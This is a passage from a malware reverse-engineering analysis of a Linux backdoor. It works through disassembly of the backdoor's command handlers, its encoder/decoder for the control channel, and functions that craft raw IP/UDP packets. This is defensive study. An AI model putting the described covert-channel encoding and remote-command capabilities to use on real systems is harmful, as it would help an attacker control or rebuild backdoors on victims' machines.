0x8048cef: pushl %eax
0x8048cf0: movzbl 0xfffff002(%ebp),%eax
0x8048cf7: pushl %eax
0x8048cf8: call 0x8049d40
Putting the code into C format:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), 0,
*0xfffff00d(%ebp), 0xffffbb44(%ebp))
The call at 0x8049d40 is unknown, contains network calls to socket()
and others, and as such has been named Network_Function_D for later
analysis.
As expected, the child process then ends with an _exit() call.
0x08048d08:
Yet again we are left with almost identical code to the previous
case section. In an attempt to not write unnecessary things, only
the differences will be noted:
0x8048d15: movl $0xb,0x807e778
Global_C is set to 11 (as expected).
The byte shift for Buffer_B is 15 bytes for this case section.
Function setup looks like this:
0x8048d63: leal 0xffffbb44(%ebp),%eax
0x8048d69: pushl %eax
0x8048d6a: movzbl 0xfffff00e(%ebp),%eax
0x8048d71: pushl %eax
0x8048d72: movzbl 0xfffff00d(%ebp),%eax
0x8048d79: pushl %eax
0x8048d7a: movzbl 0xfffff00c(%ebp),%eax
0x8048d81: pushl %eax
0x8048d82: movzbl 0xfffff00b(%ebp),%eax
0x8048d89: pushl %eax
0x8048d8a: movzbl 0xfffff00a(%ebp),%eax
0x8048d91: pushl %eax
0x8048d92: movzbl 0xfffff009(%ebp),%eax
0x8048d99: pushl %eax
0x8048d9a: movzbl 0xfffff008(%ebp),%eax
0x8048da1: pushl %eax
0x8048da2: movzbl 0xfffff007(%ebp),%eax
0x8048da9: pushl %eax
0x8048daa: movzbl 0xfffff006(%ebp),%eax
0x8048db1: pushl %eax
0x8048db2: movzbl 0xfffff005(%ebp),%eax
0x8048db9: pushl %eax
0x8048dba: movzbl 0xfffff004(%ebp),%eax
0x8048dc1: pushl %eax
0x8048dc2: movzbl 0xfffff003(%ebp),%eax
0x8048dc9: pushl %eax
0x8048dca: movzbl 0xfffff002(%ebp),%eax
0x8048dd1: pushl %eax
0x8048dd2: call 0x8049d40
Putting this into C format:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp),
*0xfffff00e(%ebp), 0xffffbb44(%ebp))
The call is to the same function as in the previous case section,
and is named Network_Function_D. There only appears to be one
difference in the call, and that has to do with the 12th argument
which before was a 0, and in this case is probably set by the
blackhat manually.
Upon function conclusion the function will _exit(0) as usual.
0x08048de4:
Yet again, we end up with very similar code. Again, only the
differences will be noted:
0x8048df1: movl $0xc,0x807e778
Global_C is set to 12 (as expected).
The byte shift for Buffer_B is 14 bytes for this case section.
Function setup looks like this:
0x8048e3f: leal 0xffffbb44(%ebp),%eax
0x8048e45: pushl %eax
0x8048e46: movzbl 0xfffff00d(%ebp),%eax
0x8048e4d: pushl %eax
0x8048e4e: movzbl 0xfffff00c(%ebp),%eax
0x8048e55: pushl %eax
0x8048e56: movzbl 0xfffff00b(%ebp),%eax
0x8048e5d: pushl %eax
0x8048e5e: movzbl 0xfffff00a(%ebp),%eax
0x8048e65: pushl %eax
0x8048e66: movzbl 0xfffff009(%ebp),%eax
0x8048e6d: pushl %eax
0x8048e6e: movzbl 0xfffff008(%ebp),%eax
0x8048e75: pushl %eax
0x8048e76: movzbl 0xfffff007(%ebp),%eax
0x8048e7d: pushl %eax
0x8048e7e: movzbl 0xfffff006(%ebp),%eax
0x8048e85: pushl %eax
0x8048e86: movzbl 0xfffff005(%ebp),%eax
0x8048e8d: pushl %eax
0x8048e8e: movzbl 0xfffff004(%ebp),%eax
0x8048e95: pushl %eax
0x8048e96: movzbl 0xfffff003(%ebp),%eax
0x8048e9d: pushl %eax
0x8048e9e: movzbl 0xfffff002(%ebp),%eax
0x8048ea5: pushl %eax
0x8048ea6: call 0x8049564
C Format:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp),
0xffffbb44(%ebp))
The function call to 0x8049564 seems to be new, contains network
function calls, and as such will be named Network_Function_E.
The child process would then terminate with a call to _exit()
This concludes the case sections, and as such, the core functionality
of the binary. The program has now been shown to have the following on
demand from the blackhat:
* Ability to execute given commands using csh.
* The ability to potentially show the response from executing such
a command to the blackhat.
* Ability to automatically terminate the execution of those commands
after a certain period of time.
* The ability to execute various functions, one at a time.
* The ability to terminate those functions.
The first two case statements are extremely interesting, and would have
to be of some importance, however their secrets are not yet known. As
the binary stands, the core functionality of it appears solid, and built
in a modular way such that any function that is called is immediately
forked off (and secure from crashing the rest of the daemon).
An analysis of the traffic expected by the binary will be completed in
Network_Analysis_A.
vi) Function Addressing:
Address Function Purpose
0x805720c geteuid() Standard
0x8055fbc exit()* Standard
0x8057764 memset()* Standard
0x80569bc signal() Standard
0x80571e8 fork() Standard
0x805733c setsid()* Standard
0x8057134 chdir() Standard
0x8057160 close() Standard
0x8057444 time() Standard
0x80559a0 srandom()** Standard
0x8056cf4 socket() Standard
0x8056b44 recv() Standard
0x80555b0 usleep()* Standard
0x804a1e8 Data_Manipulation_Function_A Memory Manipulation
0x804a194 Data_Manipulation_Function_B Memory Manipulation
0x8048ecc Network_Function_A Network
0x8049174 Network_Function_B Network
0x80499f4 Network_Function_C Network
0x8049d40 Network_Function_D Network
0x8049564 Network_Function_E Network
0x8048f94 Network_Function_F Network
0x8056058 random()** Standard (Or a wrapper)
0x8055e38 random()** Standard
0x80556cc sleep()* Standard
0x80572b0 kill() Standard
0x80557e8 system()** Standard
0x804f808 sprintf()** Standard
0x804f620 fopen()* Standard
0x804f6d4 fread()** Standard
0x804f540 fclose()** Standard
0x8057554 _exit() Standard
0x8056c9c setsockopt() Standard
0x8056a74 bind() Standard
0x8056b04 listen() Standard
0x8056a2c accept() Standard
0x8056bf0 send() Standard
0x805718c dup2() Standard
0x804a2a8 setenv()* Standard
0x804a48c unsetenv()** Standard
0x80555fc execl() Standard
0x804bf80 gethostbyname()* Standard
0x8056480 Misc_Data_Copy() Standard(Assumed)
0x8056c3c sendto() Standard
0x804ce8c inet_addr() Standard
0x804ceb4 inet_aton() Standard
* = Unconfirmed but strongly suspected
** = Guess based upon positioning of call
vii) Variable Addressing:
0x807e77c Global_A
0x807e784 Global_B
0x807e778 Global_C
0xffffee48(%ebp) Buffer_A (code starting at 0x8048134)
0xffffbb44(%ebp) Buffer_B (code starting at 0x8048134)
0x807e770 PID_Var_A
0x807e774 PID_Var_B
viii) Function Analysis
This section will look at the functions that were detected to be of
significance in the prior analysis.
a) Data_Manipulation_Function_A [0x804a1e8] - (Memory Manipulation)
Known Usage:
function(AmountOfDataReceived-22, IP_Packet_Data, SomeBuffer)
Guesses at purpose:
From the position that this function appears to be used, it is assumed
that it is some sort of unencoder used for translating packet data used
in the communication channel, between the blackhat and this binary. It
should be noted that this function would be very deliberate, and the
code about to be analysed could very well be a public encryption method.
It is also quite possible this function does not follow generic C syntax
for the production of assembly code since it may well have been written
in assembly.
Naming Conventions:
Parameters will be given the following names:
function(DataAmount, Data_In, Data_Out)
Disassembly:
The code starts off strangely for a C function. The initial stack
allocations are quite strange:
0x804a1f1: movl 0x8(%ebp),%edi
0x804a1f4: leal 0xffffffff(%edi),%ebx
0x804a1f7: leal 0x3(%edi),%eax
0x804a1fa: andb $0xfc,%al
0x804a1fc: subl %eax,%esp
The long at 0x8(%ebp) would be the "DataAmount" (Given the %ebp push and
the sub at 0x804a1eb). It's assumed this is some kind of data amount
that the function will have to decode. The code above seems to have the
effect of setting up a stack that is directly proportional to the
DataAmount + 3. The andb statement appears to simply ensure a 4 byte
alignment of the total stack allocation.
Something else strange:
0x804a201: movb 0x80675e5,%al
0x804a207: movl 0x10(%ebp),%esi
0x804a20a: movb %al,(%esi)
(gdb) x/1b 0x80675e5
0x80675e5: 0x00
Three instructions to simply NULL the first byte of Data_Out
(remembering the parameters start from 0x8(%ebp)).
Starting at 0x804a20c, looks to be some kind of looping structure with
%ebx as some counter. %ebx is first set up here:
0x804a1f1: movl 0x8(%ebp),%edi
0x804a1f4: leal 0xffffffff(%edi),%ebx
This corresponds to %ebx starting at DataAmount - 1.
The looping structure seems to start here:
0x804a20c: testl %ebx,%ebx
0x804a20e: jl 0x804a29b
Indicating the loop will continue until %ebx reaches a state of < 0.
0x804a214: leal 0xffffffff(%ebx),%edx
0x804a217: testl %ebx,%ebx
0x804a219: je 0x804a22c
%edx is set to %ebx - 1.
%ebx is checked:
if it does NOT equal 0 then:
0x804a21b: movl 0xc(%ebp),%esi
0x804a21e: movzbl (%ebx,%esi,1),%eax
0x804a222: movzbl (%edx,%esi,1),%edx
0x804a226: subl %edx,%eax
0x804a228: jmp 0x804a232
0xc(%ebp) corresponds to Data_In so, the first byte from Data_In is
loaded into %esi. The movzbl functions effectively use %ebx and %edx
as indexes within the Data_In buffer. The first one loading %eax with
the byte indexed by %ebx, and the second with the one indexed by %edx.
The subl has the effect of subtracting the value of Data_In[%edx] from
Data_In[%ebx]. Keping in mind %edx = %ebx - 1, this make sit look
like:
%eax = Data_In[%ebx] - Data_In[%ebx - 1]
This statement also explains the reason for the earlier %ebx
conditional of it being 0, for which the following would occur:
0x804a22c: movl 0xc(%ebp),%esi
0x804a22f: movzbl (%esi),%eax
This effectively just does:
%eax = Data_In[0]
Which eliminates the -1 indexing.
Either conditional that it follows, it will end up at 0x804a232:
0x804a232: leal 0xffffffe9(%eax),%ecx
0x804a235: testl %ecx,%ecx
0x804a237: jnl 0x804a244
This subtracts 23 from %eax and puts it into %ecx. This value is then
checked to be greater than 0. If not:
0x804a23c: addl $0x100,%ecx
0x804a242: js 0x804a23c
the above process is started to continue adding 0x100 to %ecx until it
turns positive.
As soon as %ecx is ensured to be positive:
0x804a244: xorl %edx,%edx
0x804a246: cmpl %edi,%edx
0x804a248: jnl 0x804a25d
%edx will ofcourse be 0 for this statement. %edi however will still be
equal to DataAmount. The statements above simply result in a jump to
0x804a25d if 0 is not less than DataAmount (i.e. if DataAmount <= 0).
A loop follows:
0x804a24c: movl 0x10(%ebp),%esi
0x804a24f: movb (%edx,%esi,1),%al
0x804a252: movl 0xfffffffc(%ebp),%esi
0x804a255: movb %al,(%edx,%esi,1)
0x804a258: incl %edx
0x804a259: cmpl %edi,%edx
0x804a25b: jl 0x804a24c
0x10(%ebp) is matched with the address of the start of the Data_Out
buffer. 0xfffffffc(%ebp) was setup earlier to point to the end of the
local stack frame, more specifically to a buffer believed to have been
setup to be the same size as DataAmount.
With this knowledge, the above loop can be seen to copy data one byte at
a time from Data_Out to this localised buffer. The total amount copied
will be DataAmount bytes (%edi).
Following this duplication of Data_Out:
0x804a25d: movl 0x10(%ebp),%esi
0x804a260: movb %cl,(%esi)
The outcome of these two lines will be to set the first byte of Data_Out
to the %ecx last modified at 0x804a23c (the one that was continually
incremented until it turned positive).
The following is the setup to the next loop:
0x804a262: movl $0x1,%edx
0x804a267: cmpl %edi,%edx
0x804a269: jnl 0x804a27e
Similar to the earlier loop, %edi is still = DataAmount, and %edx forms
a loop counter which is initialised to 1.
Now for the loop:
0x804a26c: movl 0xfffffffc(%ebp),%esi
0x804a26f: movb 0xffffffff(%edx,%esi,1),%al
0x804a273: movl 0x10(%ebp),%esi
0x804a276: movb %al,(%edx,%esi,1)
0x804a279: incl %edx
0x804a27a: cmpl %edi,%edx
0x804a27c: jl 0x804a26c
0xfffffffc(%ebp) is still the same pointer to a local buffer as it was
in the last loop. The loop consists of a byte copy routine seems to
have a purpose of byte shifting the local buffer to the right by 1 byte.
Next up is a call:
0x804a27e: movl 0xfffffffc(%ebp),%esi
0x804a281: pushl %esi
0x804a282: pushl %ecx
0x804a283: pushl $0x80678bf
0x804a288: movl 0x10(%ebp),%esi
0x804a28b: pushl %esi
0x804a28c: call 0x804f808
0xfffffffc(%ebp) still points to the local buffer. %ecx is the same
byte as earlier, the one that all the operations were done upon.
0x80678bf:
(gdb) x/1s 0x80678bf
0x80678bf: "%c%s"
Function at 0x804f808 corresponds to an sprintf() which matches the
inputs given.
Continuing with the main loop:
0x804a294: decl %ebx
0x804a295: jns 0x804a214
For a reminder, %ebx started the loop at DataAmount. According to the
above, it will finish after completing a round of %ebx = 0.
This is effectively the end of the fuction.
Disassembly Review:
It turns out this function is not as complex as expected. It is
actually quite simple. It seems to be a generic data obfuscation
function that will take a buffer of N bytes, and produce an obfuscated
buffer of N bytes.
The method is very simple, whereby the loop starts at the end of
Data_In, taking one byte at a time and subtracting the byte directly
before it. On top of this, what looks to be some arbitrary value of 23
is also subtracted from it. The result of these subtractions forms the
last byte of the Data_Out buffer. The loop cycles through doing this
for the entire buffer, obviously leaving out the subtraction of the
'previous' byte when it reaches the start of Data_In.
Function Overview:
As obvious encoder/decoder. This functionality was already assumed from
the ways this function and Data_Manipulation_Function_B were used
throughout the rest of the code.
The way that this function looks to be called on packets recv()'d and
Data_Manipulation_Function_B looks to be called just before functions
that look to send (yet to be absolutely certain), suggest that
Data_Manipulation_Function_A is more than likely an encoder function,
and Data_Manipulation_Function_B will probably be a decoder function.
b) Data_Manipulation_Function_B [0x804a194] - (Memory Manipulation)
Known Usage:
function(number, Buffer1, Buffer2)
Guesses at purpose:
After the analysis of Data_Manipulation_Function_A, the purpose of
Data_Manipulation_Function_B doesn't take too much imagination to come
up with. It is more than likely a decoder function for a buffer of
data.
Naming Conventions:
Parameters will be given the following names:
function(DataAmount, Data_In, Data_Out)
Disassembly:
One of the first functional things to occur:
0x804a19a: movl 0x8(%ebp),%edi
0x804a19d: movl 0xc(%ebp),%esi
0x804a1a0: movl 0x10(%ebp),%ebx
0x804a1a3: movb 0x80675e5,%al
0x804a1a9: movb %al,(%ebx)
To put references on everything, 0x8(%ebp) would be DataAmount,
0xc(%ebp) corresponds to a pointer to Data_In buffer, and 0x10(%ebp)
will be a pointer to Data_Out buffer. The next two lines simply seem
to set the first byte of the Data_Out buffer to 0 (albeit a strange way
of doing it).
We then start setting up for a call:
0x804a1ab: movb (%esi),%al
0x804a1ad: addb $0x17,%al
0x804a1af: movsbl %al,%eax
0x804a1b2: pushl %eax
0x804a1b3: pushl $0x80678bc
0x804a1b8: pushl %ebx
0x804a1b9: call 0x804f808
(gdb) x/1s 0x80678bc
0x80678bc: "%c"
The 0x804f808 call corresponds to a sprintf() call. Obviously the
format string is for a single character, the destination is Data_Out.
The character will consist of the first byte from Data_In, plus 0x17.
This appears to be a setup to a loop:
0x804a1be: movl $0x1,%ecx
0x804a1c3: cmpl %edi,%ecx
0x804a1c5: je 0x804a1dd
Initialising %ecx to 1 and checking if it exceeds the DataAmount. If it
doesn't, it continues:
0x804a1c8: movzbl 0xffffffff(%ebx,%ecx,1),%edx
0x804a1cd: movzbl (%ecx,%esi,1),%eax
0x804a1d1: leal 0x17(%edx,%eax,1),%eax
0x804a1d5: movb %al,(%ecx,%ebx,1)
0x804a1d8: incl %ecx
0x804a1d9: cmpl %edi,%ecx
0x804a1db: jne 0x804a1c8
Remembering that %ebx points to Data_Out, one will see that the first
statement loads %edx with an indexed value from Data_Out, corresponding
to (%ecx - 1). %esi points to Data_In, as such, the second statement
loads up an indexed byte from Data_In, corresponding to %ecx.
The leal sees to the addition of the byte from Data_In, the byte from
Data_Out, and a value of 0x17. This value is then moved into the
corresponding %ecx index in Data_Out. %ecx is incremented and the
process starts over again using the next index along.
This continues until it reaches the end of the buffer (indicated by %ecx
meeting up with DataAmount), at which time the function is over, and it
returns.
Disassembly Review:
A much simpler case than in Data_Manipulation_Function_A. The
mirrored processing of Data_Manipulation_Function_A and
Data_Manipulation_Function_B are obvious. This function simply forms a
loop utilising a byte from Data_In, the previously encoded byte, and an
arbitrary value of 23. Adding these together and effectively using the
low-order byte (which is effectively the same as a modulus 0xFF) to form
the next encoded byte. The encoded bytes are stacked up in Data_Out.
Function Overview:
Once again, quite obviously an encoder/decoder. What becomes apparant
from the combined analysis of these two functions is that there is no
'encoder' and 'decoder'. Either function will encode a buffer, and the
other function will decode it. In searching Google, several references
to modulus-based ciphers describe similar methods of encoding data, but
an exact reference to either pseudocode or actual program code to do
what is done here could not be found.
c) Network_Function_A [0x8048ecc] - (Network)
Known Usage:
function(Buffer1, Buffer2, number)
Guesses at purpose:
This function is believed to be a communications function to send data
to the blackhat. The reason behind this belief is that just before this
function was called, Data_Manipulation_Function_B was called.
Data_Manipulation_Function_B is believed to be used an an encoding
function. The only reason to call such an encoding function before
sending network traffic is if it is part of the communications channel
to the blackhat.
Naming Conventions:
Parameters will be given the following names:
function(Buffer1, EncodedBuffer, DataAmount)
Disassembly:
Starting off:
0x8048ed2: movl 0x8(%ebp),%eax
0x8048ed5: movl 0x10(%ebp),%edi
0x8048ed8: cmpl $0x0,0x807e784
0x8048edf: je 0x8048f10
0x8(%ebp) corresponds to Buffer1. 0x10(%ebp) corresponds to DataAmount.
0x807e784 was earlier named Global_B.
Global_B was set by the second case section in the "Core Functionality".
If Global_B is NOT 0:
We commence a loop, starting with:
0x8048ee1: movl %eax,%ebx
0x8048ee3: leal 0x24(%ebx),%esi
0x8048ee6: leal (%esi),%esi
0x8048ee8: pushl $0xfa0
0x8048eed: call 0x80555b0
The code at 0x80555b0 is believed to be usleep() code. 0xfa0 would be
a 4000 microsecond sleep. Following this:
0x8048ef2: pushl %edi
0x8048ef3: movl 0xc(%ebp),%edx
0x8048ef6: pushl %edx
0x8048ef7: pushl %ebx
0x8048ef8: pushl $0x807e780
0x8048efd: call 0x8048f94
%edi will still be set to DataAmount. %edx will have been set to
EncodedBuffer. %ebx was earlier set to Buffer1. 0x807e780 contents
appears to initially consist of all 0's. The analysis in the "Core
Functionality" section has shown that a particular packet using the
binary's communication channel can be used to set the first four bytes
of this buffer to the destination IP of an incoming packet (expected
to be the machine running the binary).
The call to 0x8048f94 has not yet been identified. It was earlier
followed and revealed to contain network functionality (thus why this
function was believed to be a network related function). This extra
function will now be named Network_Function_F and will be analysed
later.
The end of the looping structure:
0x8048f05: addl $0x4,%ebx
0x8048f08: cmpl %esi,%ebx
0x8048f0a: jle 0x8048ee8
As can be seen, %ebx is incremented by 4. %esi was earlier set to 36
bytes on top of Buffer1. %ebx starts at the beginning of Buffer1,
therefore the jle would result in the loop being repeated 10 times.
If Global_B IS 0:
We have a similar setup to just one iteration of the above loop:
0x8048f10: pushl %edi
0x8048f11: movl 0xc(%ebp),%edx
0x8048f14: pushl %edx
0x8048f15: pushl %eax
0x8048f16: pushl $0x807e780
0x8048f1b: call 0x8048f94
The setup is identical to what we just saw in the above loop. It
appears that if Global_B is 0, Network_Function_F is called with the
second parameter(push %eax) being set to the start of Buffer1.
No matter what Global_B is, the function now returns.
Disassembly Review:
The whole function hinges on Global_B. If Global_B is 0, it seems to
call Network_Function_F with a pointer to the beginning of Buffer1. If
Global_B is non-zero, A loop is constructed to call Network_Function_F
10 times, each time passing identical arguments, except for a pointer
that starts at the beginning of Buffer1, and is incremented by 4 bytes
for each iteration of the loop.
Function Overview:
This function appears to be some kind of wrapper to Network_Function_F.
All it seems to do is determine whether Network_Function_F is called 1
time or 10 times, all based upon Global_B. The only way to work out
what is actually going on and why this has any significance is to work
out what purpose Buffer1 plays for Network_Function_F. Buffer1's data
seems static for the duration of the binary's execution, except when the
blackhat manages to call case section 2 from the "Core Functionality"
of the binary, in which case they have the ability to set the contents
of this buffer of up to 40 bytes.
d) Network_Function_B [0x8049174] - (Network)
Known Usage:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), 0, *0xfffff006(%ebp),
*0xfffff007(%ebp), *0xfffff008(%ebp), 0xffffbb44(%ebp))
Guesses at purpose:
No idea.
Naming Conventions:
Parameters will be given the following names:
function(LongA, LongB, LongC, LongD, NumberA, LongE, LongF, LongG,
Buffer1)
Disassembly:
Start off by loading some parameters into local variables:
0x8049180: movb 0x8(%ebp),%bl
0x8049183: movb %bl,0xfffff9bc(%ebp)
0x8049189: movb 0xc(%ebp),%bl
0x804918c: movb %bl,0xfffff9b8(%ebp)
0x8049192: movb 0x10(%ebp),%bl
0x8049195: movb %bl,0xfffff9b4(%ebp)
0x804919b: movb 0x14(%ebp),%bl
0x804919e: movb %bl,0xfffff9b0(%ebp)
Doesn't really help any, so, continuing:
0x80491a4: leal 0xffffffdc(%ebp),%edi
0x80491a7: movl $0x8067698,%esi
0x80491ac: cld
0x80491ad: movl $0x9,%ecx
0x80491b2: repz movsl %ds:(%esi),%es:(%edi)
Looking at the loop, it becomes apparant that it takes a starting
position at 0x8067698 and copies 9 long's worth of data to the local
stack address of 0xffffffdc(%ebp). The data:
(gdb) x/36b 0x8067698
0x8067698: 0x15 0x00 0x00 0x00 0x15 0x00 0x00 0x00
0x80676a0: 0x14 0x00 0x00 0x00 0x15 0x00 0x00 0x00
0x80676a8: 0x15 0x00 0x00 0x00 0x19 0x00 0x00 0x00
0x80676b0: 0x14 0x00 0x00 0x00 0x14 0x00 0x00 0x00
0x80676b8: 0x14 0x00 0x00 0x00
Obviously forming a buffer of: 21,21,20,21,21,25,20,20,20.
More setup:
0x80491b4: movl $0x1,0xfffff9ac(%ebp)
0x80491be: leal 0xfffffde8(%ebp),%edi
0x80491c4: movl $0x80676bc,%esi
0x80491c9: cld
0x80491ca: movl $0x7d,%ecx
0x80491cf: repz movsl %ds:(%esi),%es:(%edi)
0xfffff9ac(%ebp) is unknown, but is set to 1. A loop is constructed to
copy 0x7d longs from 0x80676bc to a local buffer starting at
0xfffffde8(%ebp). The data:
(gdb) x/500 0x80676bc
0x80676bc: 0x47 0x6e 0x01 0x00 0x00 0x01 0x00 0x00
0x80676c4: 0x00 0x00 0x00 0x00 0x03 0x63 0x6f 0x6d
0x80676cc: 0x00 0x00 0x06 0x00 0x01 0x00 0x00 0x00
0x80676d4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x80676dc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x80676e4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
[...]
The full dump has not been produced above.
More variable setup occurs, followed by:
0x8049201: cmpl $0x0,0x18(%ebp)
0x8049205: je 0x804920a
0x18(%ebp) would correspond to the NumberA parameter of the function.
The effect of the conditional appears to simply jump the following:
0x8049207: decl 0x18(%ebp)
The outcome is that if NumberA != 0 then NumberA is decremented.
A call is then setup:
0x804920a: pushl $0xff
0x804920f: pushl $0x3
0x8049211: pushl $0x2
0x8049213: call 0x8056cf4
This is a socket() call which would look like:
socket(AF_INET, SOCK_RAW, IPPROTO_RAW)
Checking the result:
0x8049218: movl %eax,0xfffff9a8(%ebp)
0x804921e: addl $0xc,%esp
0x8049221: testl %eax,%eax
0x8049223: jle 0x8049548
Socket number is moved into 0xfffff9a8(%ebp), with the condition of it
being an error resulting in a jump to 0x8049548. If it is successful
(>0) then it continues:
0x8049229: movl $0x0,0xfffff99c(%ebp)
0x8049233: movl $0x0,0xfffff998(%ebp)
0x804923d: pushl $0x400
0x8049242: pushl $0x0
0x8049244: pushl %esi
0x8049245: call 0x8057764
%esi was earlier set:
0x80491d1: leal 0xfffff9c8(%ebp),%esi
The call to 0x8057764 was earlier elieved to be a memset(). This fits
into this situation and would look like:
memset(0xfffff9c8(%ebp), 0, 0x400)
This makes something from earlier stand out:
0x80491d7: leal 0xfffff9dc(%ebp),%ebx
0x80491e3: leal 0xfffff9e4(%ebp),%ebx
Effectively setting up two variables to point to within the same buffer
(it would be strange to memset across multiple buffers). A quick look
at the differences between them soon produce suspicions of future uses:
0xfffff9c8(%ebp) = X
0xfffff9dc(%ebp) = X + 20
0xfffff9e4(%ebp) = X + 20 + 8
Keeping in mind an IP header is 20 bytes, and a UDP header is 8, one
should definately see suspicion about these numbers.
Back to the code:
0x8049252: cmpl $0x0,0x24(%ebp)
0x8049256: je 0x80492b2
0x8049258: cmpl $0x0,0xfffff998(%ebp)
0x804925f: jg 0x80492b2
0x24(%ebp) will correspond to LongG. If it is 0, it will jump to
0x80492b2. 0xfffff998(%ebp) has been seen before, and was set to 0.
It is tested to be greater than 0, if so, it will jump to 0x80492b2.
Otherwise:
0x8049261: movl 0x28(%ebp),%ebx
0x8049264: pushl %ebx
0x8049265: call 0x804bf80
The call to 0x804bf80 is unknown, so a quick analysis is in order:
calls 0x804a9d8
calls 0x804f620 - fopen()
Looking at parameters passed to this function:
(gdb) x/1s 0x8067904
0x8067904: "/etc/host.conf"
(gdb) x/1s 0x8067913
0x8067913: "r"
Checking hosts lookup configuration (perhaps this is some kind of
dns function)
calls 0x804e180
calls 0x804d744
calls 0x804dfb4
calls 0x8057254
0x8057258: movl $0x4e,%eax
0x8057263: int $0x80
gettimeofday()
calls 0x8056e64 (does nothing system-wise)
calls 0x8057230
0x8057233: movl $0x14,%eax
0x8057238: int $0x80
getpid()
calls 0x8056e64 (already analysed)
calls 0x804e490
calls 0x804f620 - fopen()
(gdb) x/1s 0x8067d6b
0x8067d6b: "HOSTALIASES"
Definately raises suspicion of host resolution function.
calls 0x804dfe0
calls 0x804d744
calls 0x804f620 - fopen()
(gdb) x/1s 0x8067c0f
0x8067c0f: "/etc/resolv.conf"
Most probably a gethostby* function.
calls 0x804b800
calls 0x804d02c (does nothing system-wise)
calls 0x804d6b8 (does nothing system-wise)
calls 0x804a5cc
calls 0x8056cf4 (socket())
The function analysis above is in no way complete (far from it). Random
checks of certain calls has resulted in what looks like a form of host
resolution function. At this stage it is unknown exactly what function
it is, however a look at the parameters passed to it show it to be
called as:
function(Buffer1)
A few assumptions were made and tested about this function, which in the
end looks to be:
struct hostent *gethostbyname(Buffer1)
Reasoning behind this function being is primarily because of the result
usage (will be looked at shortly). The function located at 0x804bf80
will be named gethostbyname for the rest of this analysis.
Result of this function is then tested:
0x804926a: movl %eax,%edx
0x804926c: addl $0x4,%esp
0x804926f: testl %edx,%edx
0x8049271: jne 0x8049288
If the return from gethostbyname() is 0 (fail):
The following is done:
0x8049273: pushl $0x258
0x8049278: call 0x80556cc
0x804927d: movl $0x1,%edi
0x8049282: addl $0x4,%esp
0x8049285: jmp 0x80492b2
The call matches up to a sleep(0x258). The movl sees to the setting
of %edi to 1. This was earlier set to 0. It is unknown what role
this plays as yet.
If the return from gethostbyname() is nonzero (successful):
Execution continues:
0x8049288: pushl $0x4
0x804928a: leal 0xfffff9c4(%ebp),%eax
0x8049290: pushl %eax
0x8049291: movl 0x10(%edx),%eax
0x8049294: movl (%eax),%eax
0x8049296: pushl %eax
0x8049297: call 0x8056480
0x8056480 is unidentified as a function, so we analyse it:
0x8056505: repz movsl %ds:(%esi),%es:(%edi)
It primarily consists of loops set up to copy data. %esi, %edi, and
%ecx are all based upon parameters to this function. Its done in such
a way that the above stack setup *should* result in 0x4 bytes from
*0x10(%edx) being copied to 0xfffff9c4(%ebp). Judging from its
position, the function is probably some compiler-placed one rather
than home-made (so to speak). It may be as simple as a memcpy or
bcopy, but since there is no *real* way to be sure, it will be named
as Misc_Data_Copy.
The reasoning behind believing the earlier function to be
gethostbyname() is the way a parameter is passed to Misc_Data_Copy.
More specifically, 0x10(%edx) is setup as being offset by +16 bytes
from %edx (which was earlier set to the return value from the
function). In looking at the hostent structure:
struct hostent {
__const
char *h_name; /* official name of host */
char **h_aliases; /* alias list */
int h_addrtype; /* host address type */
int h_length; /* length of address */
char **h_addr_list; /* list of addresses */
};
As offset of 10 bytes would point to the start of h_addr_list. The
data copy above would effectively result in the copy of 4 bytes
(length of an IPv4 address) from this first address, to
0xfffff9c4(%ebp). This all fits in very well with the rest of this
function, so it is assumed to be correct.
The IP address seems to then be stored:
0x804929c: movl 0xfffff9c4(%ebp),%eax
0x80492a2: movl %eax,0xc(%esi)
0x80492a5: movl $0x9c40,0xfffff998(%ebp)
0xc(%esi) corresponds to 12 bytes after 0xfffff9c8(%ebp). Keeping in
mind earlier the suspicion that 0xfffff9c8(%ebp) is really a buffer to
construct a UDP packet, this all fits together with the IP address of
the host specified in Buffer1 being placed in the 'source address'
position of the buffer (bytes13-16). The variable at 0xfffff998(%ebp)
was earlier set to 0, but its purpose is yet unknown.
With what looks to be the end of the conditionals, the following code
will always be executed:
0x80492b2: testl %edi,%edi
0x80492b4: jne 0x8049250
%edi is tested. It was initially set to a state of 0 and would remain
in that state unless the gethostbyname() function was called and had a
failure, in which case it would be 1.
The jump back to 0x8049250 will occur only if gethostbyname() was called
and failed. Otherwise:
0x80492b8: movl $0x0,0xfffff990(%ebp)
0x80492c2: leal (%esi),%esi
0x80492c4: cmpl $0x1,0xfffff9ac(%ebp)
0x80492cb: jne 0x80492e8
0xfffff990(%ebp) is set to 0. 0xfffff9ac(%ebp) was initially set to 1,
so the first iteration at least of this code will continue:
0x80492cd: movl $0x0,0xfffff9ac(%ebp)
0x80492d7: call 0x8055e38
The same variable is then set back to 0, and a call to 0x8055e38 takes
place. This call is short and to the point, but doesn't seem to do
anything!?! It does some mathematicals based upon some variables at
0x807895? and returns the result. When looking at the next few
statements one would assume it to be some kind of random() function,
but this has already been assumed to be at 0x8056058. The assumption
was not proven in any way and was more a guess based upon where it was
called. A quick disassembly of the code at 0x8056058 soon reveals
that it actually calls the code at 0x8055e38! This means the earlier
assumption is most probably incorrect and that 0x8055e38 is most
likely to be random(). Either way:
0x80492dc: movl $0x1f40,%ebx
